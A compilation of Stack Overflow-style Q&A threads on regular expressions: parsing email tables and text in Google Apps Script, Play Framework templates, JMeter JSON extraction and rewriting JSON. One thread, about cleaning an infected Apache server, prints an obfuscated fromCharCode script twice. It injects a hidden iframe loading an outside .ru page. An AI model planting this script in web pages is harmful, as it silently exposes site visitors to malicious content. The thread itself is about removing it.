regex.exec not able to extract table from email body - regex

I have email body where there is a table which has "Client Time" as the heading of first left Column.
I want to extract this whole table but am getting Null with following exec.
let regex = /<tr><td><b>Client Time([\S\s]+)<table/;
Logger.log(regex.exec(tempbody));
Here is the extra code but that should be fine.
if ((table = regex.exec(tempbody)) !== null) {
row_regex = new RegExp(/<tr>(.+)<\/tr>/g);
let data, tempdata, rows, cell;
Logger.log(data);
while ((rows = row_regex.exec(table[1])) !== null) {
data = []
cell_regex = new RegExp(/<td.*?>(.+?)<\/td>/g);
while ((cell = cell_regex.exec(rows[1])) !== null) {
data.push(cell[1]);
}
if (!tempdata || (tempdata && tempdata.length === data.length)) {
sheet.appendRow(data);
}
tempdata = data;
}
inProcessLabel.removeFromThread(threads[i]);
}
What change do I need to do in regex, sorry I don't understand regular expressions much but believe that this same code worked for me in past.

Using regular expressions to parse HTML is not a good idea (for a number of reasons).
We have V8 now so you can simply add a proper HTML/XML parser library (written in pure Javascript with minimal dependencies) to your Apps Script project. Just get the library source in full or minified form and add it as its own script file.
Here are a few good options:
XPath (source: full | minified)
HTMLParser2-20KB (source: minified)

Related

Parsing email with Google Apps Script, regex issue?

I used to be quite proficient in VBA with excel, but I'm currently trying to do something with Google Scripts and I am well and truly stuck.
Basically, I am trying like to extract data out of a standardised email from Gmail into a Google sheet. There are a couple of other threads on the subject which I have consulted so far, and I can get the body of the email into the sheet but cannot parse it.
I am new to regex, but it tests OK on regex101
I am also brand new to Google Script, and even the debugger seems to have stopped working now (it did before, so would be grateful if anyone can suggest why this is).
Here is my basic function:
function processInboxToSheet() {
var label = GmailApp.getUserLabelByName("NEWNOPS");
var threads = label.getThreads();
// Set destination sheet
var sheet = SpreadsheetApp.getActiveSheet();
// Get all emails labelled NEWNOPS
for (var i = 0; i < threads.length; i++) {
var tmp,
message = threads[i].getMessages()[1], // second message in thread
content = message.getPlainBody(); // remove html markup
if (content) {
// search email for 'of:' and capure next line of text as address
// tests OK at regex101.com
property = content.match(/of:[\n]([^\r\n]*)[\r\n]/);
// if no match, display error
var property = (tmp && tmp[1]) ? tmp[1].trim() : 'No property';
sheet.appendRow([property]);
} // End if
// remove label to avoid duplication
threads[i].removeLabel(label)
} // End for loop
}
I can append 'content' to the sheet Ok, but cannot extract the address text required by the regex. Content displays as follows:
NOPS for the purchase of:
123 Any Street, Anytown, AN1 1AN
DATE: 05/05/2017
PRICE: £241,000
Seller’s Details
NAME: Mrs Seller
Thanks for reading :)
The return value of .match() is an array. The first captured group, containing the address, will be at index 1.
Based on the following line after your call to .match(), it looks like the tmp variable should have been assigned that array, not the property variable.
var property = (tmp && tmp[1]) ? tmp[1].trim() : 'No property';
That line says, if .match() returned something that isn't null and has a value at index 1, then trim that value and assign to property, otherwise assign it the string 'No property'.
So, try changing this line:
property = content.match(/of:[\n]([^\r\n]*)[\r\n]/);
To this:
tmp = content.match(/of:[\n]([^\r\n]*)[\r\n]/);
Thanks Kevin, I think I must have changed it while debugging.
The problem was with my regexp in the end. After a bit of trial and error the following worked:
tmp = content.match(/of:[\r\n]+([^\r\n]+)/);

sed multiline replace HTML with javascript malicious code

I've a apache server that has been infected with pieces of malicious javascript code to infect the computers that visit the web page.
What i'm trying to do is remove these pieces of malicious code using find and sed commands in a Linux server.
I have created a regular expression for sed that match almost everything but the "" end tag. It is in a new line and I can't find the way to match it as well.
The malicious code is:
<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }
</script>
Note of the writer: After creating the question, I can see that the web formatting cuts the previous sample. If you want to see the full sample of malicious javascript code, have a look at the text not bold in the next text and just add at the end of the text a "new line" and a "" html tag.
The regular expression that works for all the text but for the last "</script>" is:
**find /root/cambios -type f -exec sed -i 's#**<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }**##g' {} \;**
So, please, anyone can help to match the new line and the "" text??
Thank you in advance.
Indeed you shouldn't use regex for this task. As has been told many times in SO regex are not the proper tool for dealing with HTML manipulations as it is not a regular language. Your best bet is to use an HTML parser. For instance, the following unoptimized (but still simple) code uses Jsoup for achieving your goal:
import org.jsoup.Jsoup;
import org.jsoup.nodes.DataNode;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.nodes.Node;
import org.jsoup.select.Elements;
public class RemoveScript {
public static void main(String args[]){
String viralContent = "Your viral content";
String inputText = "<html><head><script>" + viralContent + "</script></head><body></body></html>";
Document doc = Jsoup.parse(inputText);
Elements scripts = doc.select("script");
for(Element element : scripts) {
for (Node child: element.childNodes()) {
if (child instanceof DataNode) {
String content = ((DataNode) child).getWholeData();
if (content.equals(viralContent)) {
element.remove();
}
}
}
}
System.out.println(doc.toString());
}
}
I'm sure other parsers can do the same very easily too.

PlayFramework 2.0 - Not able to call functions from other templates

I want to place some helper functions in another file, since they will be overly reused. I took the Computer-Databse sample's listing file:
https://github.com/playframework/Play20/blob/master/samples/scala/computer-database/app/views/list.scala.html
I created a new file, called "listing.scala.html" under the app/views package, and moved the #link function from the original file to it. This new file looks like this:
#(currentSortBy: String, currentOrder: String, currentFilter: String)
#****************************************
* Helper generating navigation links *
****************************************#
#link(newPage:Int, newSortBy:String) = #{
var sortBy = currentSortBy
var order = currentOrder
if(newSortBy != null) {
sortBy = newSortBy
if(currentSortBy == newSortBy) {
if(currentOrder == "asc") {
order = "desc"
} else {
order = "asc"
}
} else {
order = "asc"
}
}
// Generate the link
routes.Application.listPerfil(newPage, sortBy, order, currentFilter)
}
So, on my original file, I replaced the #link call, with this one:
#title
And the problem is, when I try to compile I get this error:
value link is not a member of play.api.templates.Html
But according to the documentation (http://www.playframework.org/documentation/2.0.4/ScalaTemplateUseCases) it seems to be ok.
Any guess?
Play's templates aren't the best place for placing advanced conditions, most probably you'll get better flexibility by processing it in some controller (or other method) which will return you only required link
ie.:
#title
In your case proposed link(...) function of Application controller can also return a reverse-route.
Keep in mind that including other templates is best option for repeating blocks of HTML but sometimes it's hard to get specified string (mainly because of not trimmed spaces). As you can see there is also problem with calling nested functions. Most probably you can generate whole A tag in the listing.scala.html however using it isn't comfortable enough (IMHO).

Pulling multiple values from JSON response using RegEx Extractor

I'm testing a web service that returns JSON responses and I'd like to pull multiple values from the response. A typical response would contain multiple values in a list. For example:
{
"name":"#favorites",
"description":"Collection of my favorite places",
"list_id":4894636,
}
A response would contain many sections like the above example.
What I'd like to do in Jmeter is go through the JSON response and pull each section outlined above in a manner that I can tie the returned name and description as one entry to iterate over.
What I've been able to do thus far is return the name value with regular expression extractor ("name":"(.+?)") using the template $1$. I'd like to pull both name and description but can't seem to get it to work. I've tried using a regex "name":"(.+?)","description":"(.+?)" with a template of $1$$2$ without any success.
Does anyone know how I might pull multiple values using regex in this example?
You can just add (?s) to the regex to avoid line breaks.
E.g: (?s)"name":"(.+?)","description":"(.+?)"
It works for me on assertions.
It may be worth to use BeanShell scripting to process JSON response.
So if you need to get ALL the "name/description" pairs from response (for each section) you can do the following:
1. extract all the "name/description" pairs from response in loop;
2. save extracted pairs in csv-file in handy format;
3. read saved pairs from csv-file later in code - using CSV Data Set Config in loop, e.g.
JSON response processing can be implemented using BeanShell scripting (~ java) + any json-processing library (e.g. json-rpc-1.0):
- either in BeanShell Sampler or in BeanShell PostProcessor;
- all the required beanshell libs are currently provided in default
jmeter delivery;
- to use json-processing library place jar into JMETER_HOME/lib folder.
Schematically it will look like:
in case of BeanShell PostProcessor:
Thread Group
. . .
YOUR HTTP Request
BeanShell PostProcessor // added as child
. . .
in case of BeanShell Sampler:
Thread Group
. . .
YOUR HTTP Request
BeanShell Sampler // added separate sampler - after your
. . .
In this case there is no difference which one use.
You can either put the code itself into the sampler body ("Script" field) or store in external file, as shown below.
Sampler code:
import java.io.*;
import java.util.*;
import org.json.*;
import org.apache.jmeter.samplers.SampleResult;
ArrayList nodeRefs = new ArrayList();
ArrayList fileNames = new ArrayList();
String extractedList = "extracted.csv";
StringBuilder contents = new StringBuilder();
try
{
if (ctx.getPreviousResult().getResponseDataAsString().equals("")) {
Failure = true;
FailureMessage = "ERROR: Response is EMPTY.";
throw new Exception("ERROR: Response is EMPTY.");
} else {
if ((ResponseCode != null) && (ResponseCode.equals("200") == true)) {
SampleResult result = ctx.getPreviousResult();
JSONObject response = new JSONObject(result.getResponseDataAsString());
FileOutputStream fos = new FileOutputStream(System.getProperty("user.dir") + File.separator + extractedList);
if (response.has("items")) {
JSONArray items = response.getJSONArray("items");
if (items.length() != 0) {
for (int i = 0; i < items.length(); i++) {
String name = items.getJSONObject(i).getString("name");
String description = items.getJSONObject(i).getString("description");
int list_id = items.getJSONObject(i).getInt("list_id");
if (i != 0) {
contents.append("\n");
}
contents.append(name).append(",").append(description).append(",").append(list_id);
System.out.println("\t " + name + "\t\t" + description + "\t\t" + list_id);
}
}
}
byte [] buffer = contents.toString().getBytes();
fos.write(buffer);
fos.close();
} else {
Failure = true;
FailureMessage = "Failed to extract from JSON response.";
}
}
}
catch (Exception ex) {
IsSuccess = false;
log.error(ex.getMessage());
System.err.println(ex.getMessage());
}
catch (Throwable thex) {
System.err.println(thex.getMessage());
}
As well a set of links on this:
JSON in JMeter
Processing JSON Responses with JMeter and the BSF Post Processor
Upd. on 08.2017:
At the moment JMeter has set of built-in components (merged from 3rd party projects) to handle JSON without scripting:
JSON Path Extractor (contributed from ATLANTBH jmeter-components project);
JSON Extractor (contributed from UBIK Load Pack since JMeter 3.0) - see answer below.
I am assuming that JMeter uses Java-based regular expressions... This could mean no named capturing groups. Apparently, Java7 now supports them, but that doesn't necessarily mean JMeter would. For JSON that looks like this:
{
"name":"#favorites",
"description":"Collection of my favorite places",
"list_id":4894636,
}
{
"name":"#AnotherThing",
"description":"Something to fill space",
"list_id":0048265,
}
{
"name":"#SomethingElse",
"description":"Something else as an example",
"list_id":9283641,
}
...this expression:
\{\s*"name":"((?:\\"|[^"])*)",\s*"description":"((?:\\"|[^"])*)",(?:\\}|[^}])*}
...should match 3 times, capturing the "name" value into the first capturing group, and the "description" into the second capturing group, similar to the following:
1 2
--------------- ---------------------------------------
#favorites Collection of my favorite places
#AnotherThing Something to fill space
#SomethingElse Something else as an example
Importantly, this expression supports quote escaping in the value portion (and really even in the identifier name portion as well, so that the Javascript string I said, "What is your name?"! will be stored in JSON as AND parsed correctly as I said, \"What is your name?\"!
Using Ubik Load Pack plugin for JMeter which has been donated to JMeter core and is since version 3.0 available as JSON Extractor you can do it this way with following Test Plan:
namesExtractor_ULP_JSON_PostProcessor config:
descriptionExtractor_ULP_JSON_PostProcessor config:
Loop Controller to loop over results:
Counter config:
Debug Sampler showing how to use name and description in one iteration:
And here is what you get for the following JSON:
[{ "name":"#favorites", "description":"Collection of my favorite places", "list_id": 4894636 }, { "name":"#AnotherThing", "description":"Something to fill space", "list_id": 48265 }, { "name":"#SomethingElse", "description":"Something else as an example", "list_id":9283641 }]
Compared to Beanshell solution:
It is more "standard approach"
It performs much better than Beanshell code
It is more readable

How do I use RegEx to insert into a JSON response?

I'm using JSON for a web application I'm developing. But for various reasons I need to create "objects" that are already defined on the client script based on the JSON response of a service call. For this I would like to use a regex expression in order to insert the "new" statements into the JSON response.
function Customer(cust)
{
this.Name = null;
this.ReferencedBy = null;
this.Address = null;
if (cust != null)
{
this.Name = cust.Name;
this.ReferencedBy = cust.ReferencedBy;
this.Address = cust.Address;
}
}
The JSON response is returned by an ASP.NET AJAX Service and it contains a "__type" member that could be used to determine the object type and insert the "new" statement.
Sample JSON:
{"__type":"Customer", "ReferencedBy":{"__type":"Customer", "Name":"Rita"}, "Name":"Joseph", "Address":"123 {drive}"}
The resulting string would look like this:
new Customer({"ReferencedBy":new Customer({"Name":"Rita"}), "Name":Joseph", "Address":"123 {drive}"})
I got this so far but it doesn't work right with the ReferencedBy member.
match:
({"__type":"Customer",)(.*?})
replace:
new Customer({$2})
Hmmm why don't you try to make a simplier way to do it? e.g.:
var myJSON = {"__type":"Customer", "ReferencedBy":{"__type":"Customer", "Name":"Rita"}, "Name":"Joseph", "Address":"123 {drive}"};
after check the type: myJSON.__type, and if it is customer, then:
new Customer({"ReferencedBy":new Customer({"Name":myJSON.ReferencedBy.Name}), "Name":myJSON.Name, "Address":myJSON.Address });
It is because you already have a defined data structure, it is not neccessary to use regex to match pattern & extract data.